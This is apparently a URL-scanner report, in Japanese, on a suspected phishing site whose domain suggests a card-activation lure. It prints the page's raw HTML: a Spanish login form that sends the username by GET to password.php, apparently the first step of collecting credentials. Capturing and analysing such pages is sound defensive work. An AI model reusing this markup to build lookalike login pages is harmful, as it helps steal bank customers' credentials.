- スキャンID:
- 74607761-1c15-4998-a375-a19819f9614b終了
- 送信済みURL:
- https://bdvactivartarjeta.cam/01/
- レポート終了日:
リンク · 0件検出
ページから特定された発信リンク
JavaScript変数 · 4件検出
ページのウィンドウオブジェクトにロードされたグローバルのJavaScript変数は関数以外の場所で宣言された変数で、現在のスコープ内であればコードのどこからでもアクセス可能です
名前 | 規模 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
validateUsername | function |
コンソールログメッセージ · 0件検出
Webコンソールにログ記録されたメッセージ
HTML
未加工のHTMLページ本文
<!DOCTYPE html><html lang="es"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Bienvenidos - Usuario</title>
<link rel="icon" href="imagenes/favicon.ico" type="image/x-icon">
<link rel="stylesheet" href="styles.css">
</head>
<body>
<div class="login-container">
<!-- Logo -->
<div class="logo-container">
<img src="imagenes/logo.png" alt="Logo" class="logo">
</div>
<!-- Formulario -->
<form class="login-form" action="password.php" method="GET" onsubmit="return validateUsername()">
<h2>Iniciar sesión</h2>
<label for="username">Usuario *</label>
<input type="text" id="username" name="username" placeholder="Ingresa tu usuario" maxlength="16" required="">
<span id="error-message" class="error-message"></span>
<button type="submit">Continuar</button>
</form>
</div>
<script>
function validateUsername() {
const usernameField = document.getElementById('username');
const errorMessage = document.getElementById('error-message');
if (!usernameField.value.trim()) {
errorMessage.textContent = "No puedes dejar el usuario vacío";
usernameField.focus();
return false;
}
errorMessage.textContent = ""; // Limpia el mensaje si es válido
return true;
}
</script>
</body></html>